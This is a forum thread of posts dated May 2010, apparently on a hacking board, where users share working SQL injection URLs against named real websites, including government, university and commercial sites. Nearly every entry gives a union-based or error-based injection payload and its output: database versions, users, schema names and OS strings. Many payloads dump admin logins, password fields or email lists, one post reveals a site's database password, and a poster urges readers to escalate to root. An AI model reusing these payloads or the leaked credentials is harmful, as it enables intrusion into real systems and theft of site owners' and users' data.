Site: http://www.ncgtourism.ca
TIC: 0
PR: 4
Example query: http://www.ncgtourism.ca/index4.php?id=-1+union+select+1,@@version_compile_os--+
version - 4.1.20
user - tourism@localhost
database - toursitedb
os - redhat-linux-gnu
==========================================
Site: http://www.onaonline.ru
TIC: 30
PR: 3
Example query: http://www.onaonline.ru/news_box.php?idnews=407'+union+select+1,concat_ws( 0x0b,version(),user(),database(),@@version_compile _os),3,4,5,6,7--+
version - 5.0.26-log
user - onaonline@localhost
database - onaonline
os - pc-linux-gnu
==========================================
Site: http://www.gazteplostroi.ru
TIC: 30
PR: 0
Example query: http://www.gazteplostroi.ru/item.php?id=-138'+union+select+1,concat_ws(0x0b,version(),user( ),database(),@@version_compile_os),group_concat(0x 0b,table_name),null,null,6,7,now()+from+informatio n_schema.tables--+
version - 5.0.77
user - intertime_gaz@localhost
database - intertime_gaz
os - pc-linux-gnu
http://theosophytrust.org/tlodocs/articlesRC.php?d=The_Occult_Side_Of_Nature.htm&p=-35+union+select+1,2,3,4,concat_ws(0x3a,version(),d atabase(),user(),@@version_compile_os),6,7,8,9,10--+
version:4.0.27-max-log
user:hermes_db@208.109.138.107
http://www.truthcommission.org/commission.php?lang=en&cid=0+union+select+1,2,concat_ws(0x3a,version(),da tabase(),user(),@@version_compile_os),4,5--+
version:5.0.77:37614_dbtruthcom
user:37614_truthcom@lnh-www1i.bluehalo.myregisteredsite.com
http://www.finishertriatlon.com/revista/noticias.php?id=-121+union+select+1,aes_decrypt(aes_encrypt(concat_ ws(0x3a,user(),version(),database(),@@version_comp ile_os),1),1),3,4,5&year=2010
www.tamaris.de/home/collection/shoes/l/1/detail/1 union select 1,2,3,4,5,6,7,8,version(),10,11,12,13,14,15,16,17, 18--9/c/1.html?request=1
http://www.mortarinvestments.eu/vehicle.php?id=-171+union+select+1,2,3,4,concat(user(),version(),d atabase(),@@version_compile_os),6,7,8
http://www.emantravel.com/article.php?id=-77+union+select+concat_ws(0x3a,user(),version(),da tabase(),@@version_compile_os),2
http://www.mtg.es/en/diseno_todostallas.php?enid=-8+union+select+1,2,3,concat_ws(0x3a,user(),version (),database(),@@version_compile_os),5,6,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27, 28,29,30,31,32,33,34,35,36,37,38,39,40,41
http://www.norica.es/index.php?opt=2&id=-323+union+select+1,2,3,4,5,concat(user_login,char( 58),user_pass),7,8,9,10,11,12,13,14,15,16,17,18,19 ,20+from+test.wp_users+limit+0,1--
+phpinfo
http://www.norica.es/phpinfo.php
www.websiteicons.net/index.php?id=-6 union select 1,2,version(),4,5,6,7,8,9,10,11,12,13--&p=icons
www.companycoltd.com/company_coltd.php?company_id=f620555555555 union select 1,@@version,3,4,5,6,7,8,9,10,11,12,13--
www.berlin.de/tourismus/unterkunft/pensionen/mirnet/hotel/buchung/anfrage.php3?objektnr=38 union select version(),2,3,4,5,6,7--&p=1&s=de&an=&ab=
For connoisseurs of alcoholic beverages....
http://www.bestwine.ru/index.php?action=product_view&id=-768+union+all+select+1,2,3,4,5,6,7,8,9,concat_ws(c har(58),@@version,user(),database(),@@version_comp ile_os),11,12,13,14,15,16,17,18,19,20,21,22,23,24, 25,26,27,28,29,30,31,32,33,34,35,36,37,38+--
version : 5.0.67-log
user : u93285@10.10.153.168
database : u93285
os : unknown-freebsd6.2
http://www.bestwine.ru/index.php?action=product_view&id=-768+union+all+select+1,2,3,4,5,6,7,8,9,concat_ws(c har(58),login,password),11,12,13,14,15,16,17,18,19 ,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,3 6,37,38+from+bw_admin--
To be honest, I don't know whether this can be called an injection or not, but here it is:
http://www.evidenceofhumanity.org/story.php?id=9'
As a result we get:
[dbserver] => localhost [dbusername] => evidence_admin [dbpassword] => 53889160Cody [dbdatabase] => evidence_evidence [dbProvider] => MySQL
I think this is the most interesting part
http://www.vestidos.ru/pages/catalog.php?cid=-97+and+1=2+union+select+1,2,3,4,5,concat_ws(0x3a,@ @version,user(),database(),@@version_compile_os),7 ,8,9,10,11,12,13,14,15,16,17+--
version : 5.0.24-standard
user : vestidos@localhost
database : db_vestidos
os : pc-linux-gnu
http://www.konqi.com/en/read_article.asp?articleid=-69+union+select+1,password,3,4,5,6,7,8,9,10+from+u ser
ms_access :)
aka_zver
11.05.2010, 18:39
Site: http://www.gourmandisedesserts.com
TIC: 0
PR: 3
Example query: http://www.gourmandisedesserts.com/class.php?id=-65+union+select+1,concat_ws(0x0b,version(),user(), database(),@@version_compile_os),group_concat(0x0b ,table_name),null,5,null,null,null,9,10,11,12,null ,14+from+information_schema.tables--+
version - 5.0.67.d7-ourdelta-log
user - gourmandise@72.167.232.226
database - gourmandise
os - unknown-linux-gnu
==========================================
Site: http://www.doors007.ru
TIC: 10
PR: 1
Example query: http://www.doors007.ru/item2.php?id=-252+union+select+1,concat_ws(0x0b,version(),user() ,database(),@@version_compile_os),group_concat(0x0 b,table_name),4,5,6,7,8,9,10,11,12,13,14,15,16+fro m+information_schema.tables--+
version - 5.0.89-Max-log
user - k0038kze_db@c10-w.ht-systems.ru
database - k0038kze_stroyka
os - unknown-linux-gnu
==========================================
Site: http://www.mosadharavkook.com
TIC: ?
PR: 2
Example query: http://www.mosadharavkook.com/store/item2.php?id=-408+union+select+1,concat_ws(0x0b,version(),user() ,database(),@@version_compile_os),3,4,5,6,7,8,9,10 ,11,12,13,14,15,16,17,18--+
version - 4.1.22-standard
user - mravkook_yoni@localhost
database - mravkook_catalog
os - pc-linux-gnu
==========================================
Site: http://www.northcitymarine.com.au
TIC: 0
PR: 0
Example query: http://www.northcitymarine.com.au/item2.php?id=-15+union+select+1,2,3,4,5,6,7,8,concat_ws(0x0b,ver sion(),user(),database(),@@version_compile_os),10, 11,12,13,14,15,null,17--+
version - 4.0.27-standard
user - ZR12600_ncmmain@204.14.110.100
database - ZR12600_ncmsite
os - pc-linux-gnu
5.0.90-community
http://chaithanya.org/php/readmore.php?id=-5+union+select+1,version(),group_concat(0x0b,colum n_name),4,5,6,7,8,9+from+information_schema.column s+where+table_name=0x757365726C6F67696E+--
table: userlogin::userid,username,userpassword,usertype,u serstatus
and
http://chaithanya.org/php/readmore.php?id=-5+union+select+1,2,group_concat(0x0b,username,0x3a ,userpassword),4,5,6,7,8,9+from+userlogin+--
PR 2
http://davigames.com/games.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17--
PR 2, TIC 10
http://gsm-sprut.com/n.php?nid=-1+union+select+1,2,3,4,5,6--
http://www.hdmi.hr/stc2007/index.php?id=-3+union+select+1,2,3,4,concat_ws(0x3a,user(),versi on(),database(),@@version_compile_os),6,7,8,9,10,1 1,12,13+from+admin--
http://www.oceanmore.hr/knjiga.php?id_knjiga=-62+union+select+1,concat_ws(0x3a,user(),version(), database()),3,4,5,6,7,8
aka_zver
11.05.2010, 22:47
Site: http://www.netcurtainsdirect.com
TIC: 10
PR: 2
Example queries: http://www.netcurtainsdirect.com/item2.php?id=-316'+union+select+1,concat_ws(0x0b,version(),user( ),database(),@@version_compile_os),3,group_concat( 0x0b,table_name),5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,3 4,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50, 51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67 ,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,8 4,85,86,87,88+from+information_schema.tables--+
http://www.netcurtainsdirect.com/item2.php?id=-316'+union+select+1,2,3,group_concat(0x0b,column_n ame),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 ,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,3 8,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54, 55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71 ,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,8 8+from+information_schema.columns+where+table_name ='phpbb_users'--+
version - 5.0.67
user - netcurtains@localhost
database - netcurtainsdirect_com_-_cnets
os - redhat-linux-gnu
ЦЕНТР СТРАТЕГІЧНИХ ІНІЦІАТИВ
http://www.csi.km.ua/news.php?page=1&new=-43+union+select+1,2,3,4,concat(table_schema,char(5 8),table_name),6,7,8,9,10,11+from+information_sche ma.columns--
http://www.princesscruises.com.do/destinos/index.php?id=-2+union+select+1,aes_decrypt(aes_encrypt(concat(us er,char(58),pass),1),1)+from+admin
http://sips.inesc-id.pt/projects.php?id=-15+union+select+1,version(),user(),database(),@@ve rsion_compile_os,6,7,8,9,10,11,12-- (PR-5)
http://www.universal.pt/main.php?id=-69+union+select+1,2,concat(username,char(58),passw ord),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20, 21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37 ,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,5 4,55,56,57,58,59,60+from+_tusers+limit+0,1-- [PR-5]
aka_zver
12.05.2010, 15:10
Site: http://www.retromoderndesign.com
TIC: 10
PR: 3
Example query: http://www.retromoderndesign.com/sold.php?id=-7+union+select+1,2,concat_ws(0x0b,version(),user() ,database(),@@version_compile_os),4,5,group_concat (0x0b,table_name),7,8,9,10,11,12,13,14,15,16,17,18 ,19,20,21+from+information_schema.tables--+
version - 5.0.90-log
user - d1479@194.236.32.155
database - d1479
os - pc-linux-gnu
==========================================
Site: http://www.malloves.com
TIC: 0
PR: 3
Example queries: http://www.malloves.com/item2.php?id=266'+union+select+1,concat_ws(0x0b,ve rsion(),user(),database(),@@version_compile_os),3, group_concat(0x0b,username,0x3a,password),5,6,7,8, 9,10,11,12+from+go_users--+
http://www.malloves.com/item2.php?id=266'+union+select+1,concat_ws(0x0b,ve rsion(),user(),database(),@@version_compile_os),3, group_concat(0x0b,email),5,6,7,8,9,10,11,12+from+g o_email_list--+
version - 5.0.77
user - malloves@localhost
database - malloves
os - redhat-linux-gnu
==========================================
Site: http://www.pony1997.com
TIC: 0
PR: 2
Example query: http://www.pony1997.com/item2.php?id=4&tbl=catitems2&stl=cast((SELECT+version()||chr(58)||current_user| |chr(58)||current_database())+as+int)--
version - PostgreSQL 8.1.4 on i386-portbld-freebsd6.1, compiled by GCC cc (GCC) 3.4.4 [FreeBSD] 20050518
user - gt108043
database - gt108043
os - i386-portbld-freebsd6.1
==========================================
Site: http://www.listentoaudioproshop.com
TIC: 0
PR: 0
Example query: http://www.listentoaudioproshop.com/item3.php?id=53+union+select+1,concat_ws(0x0b,vers ion(),user(),database(),@@version_compile_os),3,4, 5,6,7,8,9,group_concat(0x0b,username,0x3a,password )+from+proshop_login--+
version - 5.0.67
user - tookd_kwan@localhost
database - tookd_kwan
os - pc-linux-gnu
==========================================
Site: http://www.concretorecs.com
TIC: 0
PR: 3
Example query: http://www.concretorecs.com/store/item3.php?id=-2789+union+select+1,2,3,4,5,6,concat_ws(0x0b,versi on(),user(),database(),@@version_compile_os),8,9--+
version - 4.1.22-standard-log
user - concreto_concret@localhost
database - concreto_concreto
os - pc-linux-gnu
==========================================
Site: http://www.newsnetwork-bd.com
TIC: 0
PR: 3
Example query: http://www.newsnetwork-bd.com/UI/Public/Common.php?ID=1+or+(select+count(*)+from+(select+1 +union+select+2+union+select+3)x+group+by+concat(m id(concat_ws(0x0b,version(),user(),database(),@@ve rsion_compile_os),+1,+70),+floor(rand(0)*2)))--+
version - 4.1.22-max-log
user - newsnet1@68.178.254.199
database - newsnet1
os - unknown-linux-gnu
http://www.festivaltv.ru/bratina/honor/index.php?id=-16+union+select+1,2,version()+--+
version: 5.0.45
filepriv=no;
http://rascunho.iol.pt/pagina.php?id=-5+union+select+1,concat_ws(user(),version(),databa se(),@@version_compile_os),3,4,5,6
PR=6
http://en.fondsk.ru/article.php?id=-2845+UNION+SELECT+1,2,3,4,5,concat_ws%280x3a,user% 28%29,version%28%29,database%28%29%29,7,8,9,10,11, 12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 ,29,30--
User: u32888@10.10.10.224
Version: 5.0.67-log
Database: u32888
Google PR: 4
p@pillon
12.05.2010, 21:02
Pr 4
http://www.panlarchile2010.cl/espanol/pagina.php?id=-1+union+select+1,2,3,4,5,email,7,8,9,10,11,12,13,1 4+from+clientes+--+
Pr 5
http://www.taan.org.np/article1.php?id=-1/**/union/**/all/**/select/**/1,2,3,4,5,6,7,8,9,Password,Name,12+from+tblAdmin
http://www.diariodemadryn.com/pagina.php?ID=-1+union+select+1,2,3,4,email,6,nombre,pass,9,10+fr om+lectores
Pr 5
http://www.copernico.ch/deutsch/pagina.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10
Version :4.1.22
User : copernico@localhost
Server :Apache/2.2.6 (Unix) PHP/5.2.10
aka_zver
12.05.2010, 21:44
Site: http://www.danceforfun.at
TIC: 0
PR: 3
Example query: http://www.danceforfun.at/common.php?id=-3+union+select+concat_ws(0x0b,version(),user(),dat abase(),@@version_compile_os)--+
4.0.24_Debian-10sarge1
da000113@www-04.inode.at
da000113_d4f
pc-linux-gnu
============================================
Site: http://sports.njau.edu.cn
TIC: 0
PR: 5
Example queries: http://sports.njau.edu.cn:8038/common.php?id=-6+union+select+1,2,3,concat_ws(0x0b,version(),user (),database(),@@version_compile_os),5,6--+
http://sports.njau.edu.cn:8038/common.php?id=-6+union+select+1,2,3,group_concat(0x0b,table_name) ,5,6+from+information_schema.tables--+
version - 5.1.25-rc-community
user - root@localhost
database - sports
os - Win32
KENT1994
12.05.2010, 22:18
.gov
http://www.fppc.ca.gov/index.php?id=500 UNION ALL SELECT %String_Col%--
Host IP: 209.63.210.7
Web Server: Microsoft-IIS/6.0
Powered-by: PHP/5.2.10
DB Server: MySQL >=5
Current DB: webdb_dbo
http://prescott-az.gov/services/parks/parks/index.php?id=24 UNION ALL SELECT 1,%String_Col%,3,4,5,6,7,8,9,10,11,12,13,14,15,16, 17,18,19,20,21,22,23,24,25--
Host IP: 63.229.103.73
Web Server: Apache
DB Server: MySQL >=4.1
Current DB: recreation
http://www.algol.com.ua/continents/countries/cities/places_t.php?ID=-1%20UNION%20SELECt%20concat_ws%280x3a,user%28%29,d atabase%28%29,version%28%29%29--+&CID=3&PID=1&PCID=1&PPID=&PPCID=2
PR:4
User: algolco_algol@localhost
Database: algolco_algol
Version: 5.0.90-community
KENT1994
12.05.2010, 23:29
http://www.rfidupdate.com/articles/index.php?id=1241 UNION ALL SELECT 1,2,%String_Col%,4,5,6,7,8,9,10,11,12,13,14,15--
Host IP: 216.97.224.21
Web Server: Apache/1.3.41 (Unix) mod_fastcgi/2.4.6 mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a
Powered-by: PHP/4.4.9
DB Server: MySQL >=5
Current DB: rfidup2_rfidupdate
http://www.dsi-keyboards.com/keyboard/item.php?id=110 AND %True_Expression%
Host IP: 205.178.145.6
Web Server: Apache/2.2.8 (Unix) FrontPage/5.0.2.2635
Powered-by: PHP/5.2.6
DB Server: MySQL >=5
Current DB: dsi_image
hackEr :p :o :rolleyes: :cool:
http://www.magfloat.com/telas/pagina.php?id=26 UNION ALL SELECT 1,2,3,%String_Col%,5,6,7--
Host IP: 201.76.59.10
Web Server: Microsoft-IIS/6.0
Powered-by: ASP.NET
DB Server: MySQL >=5
Current DB: magfloat
http://www.jhortscib.com/show_abs.php?newid=1067+and+2=1+union+select+1,2,3 ,4,version(),6,7,8,9%23
pr6
5.0.51a-community-log
http://www.convice.ru/lev/3/2/id/-8+union+select+null,null,version(),null,null,null, null,null,null
PostgreSQL 8.0.7 on i386-portbld-freebsd6.1, compiled by GCC cc (GCC) 3.4.4 [FreeBSD] 20050518
http://www.eliteshina.ru/tyreinfo.php?id=-598+union+select+version();--
PostgreSQL 8.2.3 on x86_64-unknown-linux-gnu, compiled by GCC gcc (GCC) 4.1.1 20061011 (Red Hat 4.1.1-30) (output in the title)
http://farm.x-price.ru/subscriber.php?id=-1839+union+select+null,null,null,null,null,null,ve rsion();--+
PostgreSQL 8.3.9 on x86_64-pc-linux-gnu, compiled by GCC gcc-4.3.real (Debian 4.3.2-1.1) 4.3.2
http://www.protok.ru/price2.php3?idgr=-2+and+1=2+union+select+concat_ws(0x3a,@@version,us er(),database(),@@version_compile_os)+--
version : 4.0.27-standart
user : protok@localhost
database : db_protok
os : pc-linux-gnu
www.javaportal.ru/books/aboutbook.php?id=30UNION ALL SELECT 1,%String_Col%,3,4,5,6,7,8,9,10,11,12--
http://www.sbi.org.br/padrao.php?id=-1+union+select+1,2,3,4,5,concat_ws(0x3a3a3a,versio n(),database(),user()),7,8,9--
http://www.xtremewarrior.com/post_comment.php?id=-1999+union+select+1,2,unhex(hex(concat_ws(0x3a,adm in_name,admin_pwd,%20admin_id))),4,5,6+from+admin--
aka_zver
13.05.2010, 20:11
Site: http://www.vtmit.vt.edu
TIC: 0
PR: 4
Example request: http://www.vtmit.vt.edu/academics/module.php?id=-7+union+select+1,concat(version(),0x0b,user(),0x0b ,database(),0x0b,@@version_compile_os,0x0b),null,g roup_concat(0x0b,table_name)+from+information_sche ma.tables--+
version - 5.0.77
user - iddl@thnad
database - iddl
os - redhat-linux-gnu
============================================
Site: http://www.som.si
TIC: 0
PR: 2
Example requests: http://www.som.si/shop_item.php?id=-6153+union+select+1,2,3,concat_ws(0x0b,version(),u ser(),database(),@@version_compile_os),5,group_con cat(0x0b,table_name),7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22+from+information_schema.tables--+
http://www.som.si/shop_item.php?id=-6153+union+select+1,2,3,concat_ws(0x0b,version(),u ser(),database(),@@version_compile_os),5,group_con cat(0x0b,user_id,0x3a,username,0x3a,password,0x3a, email),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,2 2+from+phorum_users--+
version - 5.1.41-3ubuntu12
user - somsi@plesk2.gigaspark.com
database - somsi
os - debian-linux-gnu
tables:
============================================
Site: http://polnolunie.com
TIC: 0
PR: 1
Example requests:
http://polnolunie.com/browse.php?cat=-8/**/union/**/select/**/1,concat_ws(0x0b,version(),user(),database(),@@ver sion_compile_os),3,group_concat(0x0b,table_name),5 ,6,7,8,9,10,11,12,13,14/**/from/**/information_schema.tables--
http://polnolunie.com/browse.php?cat=-8/**/union/**/select/**/1,group_concat(0x0b,email),3,group_concat(0x0b,use rname,0x3a,pass),5,6,7,8,9,10,11,12,13,14/**/from/**/users--
http://polnolunie.com/browse.php?cat=-8/**/union/**/select/**/1,group_concat(0x0b,user_email),3,group_concat(0x0 b,username,0x3a,user_password),5,6,7,8,9,10,11,12, 13,14/**/from/**/phpbb_users--
version - 5.1.46
user - client@localhost
database - polnolunie
os - portbld-freebsd8.0
tables:
http://www.lelana.ru/info.php?id=99++union+select+1,version(),3,4,5,6,7 ,8,9,10/*
version: 4.1.21
database: oberonmoscow
user: oberonmoscow@217.199.218.38
PR: 2
http://www.slavneft.ru/press/info.php?id=-99+union+select+1,2,version(),4,5,6,7,8,9--
version: 4.0.23a-log
database: db_slavneft_main
user: slavneft_main@localhost
PR: 5
BrainDeaD
14.05.2010, 02:01
http://www.slavneft.ru/press/info.php?id=-99+union+select+1,2,version(),4,5,6,7,8,9--
Repost, sorry.
[Feldmarschall]
14.05.2010, 04:42
http://www.eurekalert.org/multimedia/pub/22293.php?from=-160331+union+select+version%28%29,2,3--
Version: 4.0.20-max-log
Database: eurekalert
User: nobody@ekaweb05.eurekalert.org
need to quit smoking
http://www.humidor-club.ru/catalog/index.php?dir=show&catid=-76+and+1=2+union+select+1,2,concat_ws(char(58),ver sion(),user(),database(),@@version_compile_os),4,5 ,6,7--&mainid=1&typeid=7
version : 5.0.67-log
user : u29605@10.10.227.201
database : u29605
os : unknown-freebsd6.3
+ forum
http://www.sisef.it/forest@/show.php?id=-1+or(1,1)=(select+count(0),concat((select+who+from +userlist+limit+0,1),floor(rand(0)*2))from(informa tion_schema.tables)group+by+2)--
TIC10(R2) PR5 AR1922309
http://www.kar.org.ua/?act=categ&id=-1%20OR%20%28SELECT%20COUNT%28*%29%20FROM%20%28SELE CT%201%20UNION%20SELECT%202%20UNION%20SELECT%203%2 9x%20GROUP%20BY%20CONCAT%28version%28%29,%20FLOOR% 28RAND%280%29*2%29%29%29%20--
User: kar4500_m1@82.197.131.60
Database: kar4500_m1
Version: 4.1.18-log
http://www.weisskreuz.ru/index.php?cat=-5+union+select+0,concat(0x3a,@@version,user(),data base(),@@version_compile_os),2+--
jecka3000
14.05.2010, 18:22
http://www.michaelpollan.com/article.php?id=-87+union+select+1,concat(version(),0x20,database() ,0x20,user()),3,4,5,6,7,8,9,10--
5.0.81-community
pollan_articles
pollan_article@localhost
http://www.rtos.com/page/product.php?id=-2+union+select+1,concat(version(),0x20,database(), 0x20,user()),3,4--
5.0.77-log
expresslogic
expresslogic@216.119.112.190
http://www.spoono.com/photoshop/tutorials/tutorial.php?id=-77+union+select+1,concat(version(),0x20,database() ,0x20,user()),3,4,5,6,7,8,9,10--
5.0.90-community-log
spoono_sections
spoono_db@localhost
http://www.feldgrau.com/main1.php?ID=-7+union+select+1,concat(version(),0x20,database(), 0x20,user()),3,4,5,6,7,8,9,10--
5.0.38-Ubuntu_0ubuntu1.4
feldgrau
feldgrau@localhost
http://www.southworth.com/page.php?id=-100+union+select+concat(version(),0x20,database(), 0x20,user())--
4.1.22
southworthbs
swdata@localhost
http://www.choices.edu/resources/detail.php?id=-187+union+select+1,concat(version(),0x20,database( ),0x20,user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16, 17,18,19,20,21,22,23,24,25,26,27,28--
4.1.22
Choices
choices@impala.services.brown.edu
http://grb.sonoma.edu/details.php?id=-305+union+select+1,2,3,4,5,6,7,8,9,concat(version( ),0x20,database(),0x20,user()),11,12,13,14,15,16,1 7,18,19,20,21,22,23,24,25,26,27,28,29,30,31--
4.1.22-standard
grb
grb@paralleluniverse.sonoma.edu
http://imperial.ca.gov/dept.php?id=-32+union+select+concat(version(),0x20,database(),0 x20,user())--
5.0.27-community-nt
imperial
ricardohdz@localhost
http://start-chel.ru/catalog/?CatID=86+and+1=2+union+select+concat_ws(0x3a,@@ve rsion,user(),database(),@@version_compile_os)+--
version : 4.1.22-lk-log
user : startchelr@localhost
database : startchelr
os : pc-linux-gnu
http://www.cpen.com/artikel.php?aid=-49+union+select+1,2,3,4,concat(userName,char(58),U serEmail),6,7+from+users+limit+0,1--
PR-5
Calcutta
14.05.2010, 22:17
_http://www.uludag.edu.tr/uludagunien.php?kat=-5+union+select+1,2,3,4,5,6,7,version()
Database Version: 4.1.22
PR-8
admin panel - error 403
aka_zver
14.05.2010, 22:25
Site: http://www.seaes.manchester.ac.uk
TIC: 20
PR: 7
Example requests: http://www.seaes.manchester.ac.uk/undergraduate/courses/modules/module.php?id=-336+union+select+1,concat_ws(0x0b,version(),user() ,database(),@@version_compile_os,0x0b),3,4,5,6,7,8 ,9,0,1,2,3,4,5,6,7,8,9,0,1,2,group_concat(0x0b,tab le_name),4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4 ,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9 ,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4 ,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9 ,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8+from+inform ation_schema.tables--+
http://www.seaes.manchester.ac.uk/undergraduate/courses/modules/module.php?id=-336+union+all+select+1,group_concat(0x0b,user_emai l),3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,group_c oncat(0x0b,user_name,0x3a,user_password),4,5,6,7,8 ,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3 ,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8 ,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3 ,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8 ,9,0,1,2,3,4,5,6,7,8+from+cpg132_users--+
version - 5.1.34-1-log
user - earthadmuser@abel.mc.man.ac.uk
database - earthadm
os - debian-linux-gnu
==========================================
Site: http://www.beoordeelmijnleraar.nl
TIC: 0
PR: 3
Example request: http://www.beoordeelmijnleraar.nl/sub.php?groupID=5&userID=4&ID=9999+or+(select+count(*)+from+(select+1+union+s elect+2+union+select+3)x+group+by+concat(mid(conca t_ws(0x0b,version(),user(),database(),@@version_co mpile_os,0x0b),+1,+70),+floor(rand(0)*2)))--+
version - 5.0.32-Debian_7etch12-log
user - bml@localhost
database - bml
os - pc-linux-gnu
==========================================
Site: http://www.donkervoorttouringclub.nl
TIC: 10
PR: 2
Example request: http://www.donkervoorttouringclub.nl/splace/f.php?ID=11335+or+(select+count(*)+from+(select+1+ union+select+2+union+select+3)x+group+by+concat(mi d(concat_ws(0x0b,version(),user(),database(),@@ver sion_compile_os,0x0b),+1,+70),+floor(rand(0)*2)))--+
version - 5.0.81-log
user - dtc_splace@localhost
database - dtc_splace
os - pc-linux-gnu
http://www.goudengravure.nl/goudengravure.php?ac=module&module=aanbod&id=-1 UNION SELECT 1,2,concat_ws(0x3a,user(),database(),version()),4, 5,6,7,8,9,10,11 from information_schema.tables limit 0,1+--+
User: u005893_bart@web7.c1.internal
Database: db005893_goude000
Version: 5.0.87-d10-ourdelta65-byte3+bytelenny1-log
http://www.mace.manchester.ac.uk/postgraduate/research/projects/description/?id=-1+or%281,1%29=%28select+count%280%29,concat%28%28s elect+concat_ws%280x3a,user%28%29,database%28%29,v ersion%28%29%29+from+information_schema.tables+lim it+125,1%29,floor%28rand%280%29*2%29%29from%28info rmation_schema.tables%29group+by+2%29--++
User: mcgsswh@kepler.mc.man.ac.uk
Database: pip
Version: 5.1.34-1-log
http://www.acllf.org/album.php?type=centre&id=-1%20UNION%20SELECT%201,2,concat_ws%280x3a,user%28% 29,database%28%29,version%28%29%29,4++
User: acllf@localhost
Database: acllf
Version: 5.0.51a-3ubuntu5.5
http://students.ee.sun.ac.za/~aresazi/eendragweb/hk.php?id=-1%20OR%20%28SELECT%20COUNT%28*%29%20FROM%20%28SELE CT%201%20UNION%20SELECT%202%20UNION%20SELECT%203%2 9x%20GROUP%20BY%20CONCAT%28user%28%29,%20FLOOR%28R AND%280%29*2%29%29%29%20--
User: aresazi@web.ee.sun.ac.za
Database: aresazi
Version: 5.0.51a-3ubuntu5.5
jecka3000
14.05.2010, 22:52
Here's another batch of injections from me =))
All that's left for you is to put in a little effort to get full root... =))
P.S. I'm not posting logins and passwords in plain text; whoever needs them can copy-paste the links into the address bar themselves =)
Mostly sites in the .edu zone
seafmd-rcu.oie.int
http://www.seafmd-rcu.oie.int/news.php?articleID=-65+union+select+concat(username,0x20,password),2,3 ,4,5+from+users+limit+4,1--
uselessjunk.com
http://www.uselessjunk.com/article_full.php?id=-13199+union+select+1,2,fld_password,4,5,6+from+tbl _admin--+
harrisburgu.edu
http://www.harrisburgu.edu/news/article.php?id=-610+and+1=2+union+select+1,concat(username,0x20,pa ssword),3,4+from+users+limit+3,1--
stnersess.edu
http://www.stnersess.edu/news/detail.php?id=-260+union+select+1,2,3,4,5,6,concat(password,0x20, userid),8+from+users--
mbc.edu
http://www.mbc.edu/news/r_detail.php?id=-1947+union+select+concat(Username,0x20,Password),2 ,3,4,5,6,7,8+from+tbladmin--
llk.media.mit.edu
http://llk.media.mit.edu/spotlight.php?id=-3+union+select+concat(User,0x20,Password),2,3,4,5+ from+mysql.user--
BrainDeaD
15.05.2010, 03:58
http://www.vostokagro.ru/content.php?id=90+and+(select+1+from+(select+count (0),concat((select+concat_ws(0x3a,database(),versi on(),user())),floor(rand(0)*2))+from+information_s chema.tables+group+by+2)a)--+
Database: u18876_3
Version: 5.0.88-log
User: u18876@10.10.227.511
PR: 3
TIC: 120
http://www.redicecreations.com/article.php?id=7381'+and+(select+1+from+(select+co unt(0),concat((select+concat_ws(0x3a,database(),ve rsion(),user())),floor(rand(0)*2))+from+informatio n_schema.tables+group+by+2)a)--+
Database: redicecreations
Version: 5.0.32-Debian_7etch11-log
User: redicecreations@srv48.
PR: 5
TIC: 10
Lasteeck
15.05.2010, 06:35
http://www.legovaz.spb.ru
http://www.legovaz.spb.ru/photogallery/photo.php?id=100+and+1=0+union+select+1,2,3,concat _ws%280x3a,user%28%29,database%28%29,version%28%29 %29,5--
User: legovaz_spb@fe79.hc.ru
Database: wwwlegovazru_spb
Version: 4.1.25-log
TIC 10
PR 1
http://www.supervolos.ru/index1.php?t=-1+union+select+1,2,3,concat_ws(char(58),@@version, user(),database(),@@version_compile_os),5,6,7,8+--
version : 5.0.54
user : z262240_igoruser@localhost
database : z262240_svolos
os : pc-linux-gnu
http://www.gdchivast.com/index.php?f=rendiandongtai&ac=read&id=-1%20UNION%20SELECT%201,2,concat_ws(0x3a,user(),dat abase(),version()),4,5,6,7,8,9,10,11,12,13+--+
Version: 4.1.20
Database: gdchivast
User: gdchivast_f@localhost
http://www.samaranews.ru/
http://www.samaranews.ru/catalog/art/art.php?art=-1+and+1=2+union+select+1,concat_ws(char(58),@@vers ion,user(),database(),@@version_compile_os),3,4,5, 6+--
version : 5.0.51a-community-nt-log
user : gb_samnews@10.0.2.3
database : gb_samnews
os : Win64
http://historywired.si.edu/object.cfm?ID=-1' or 1=@@version
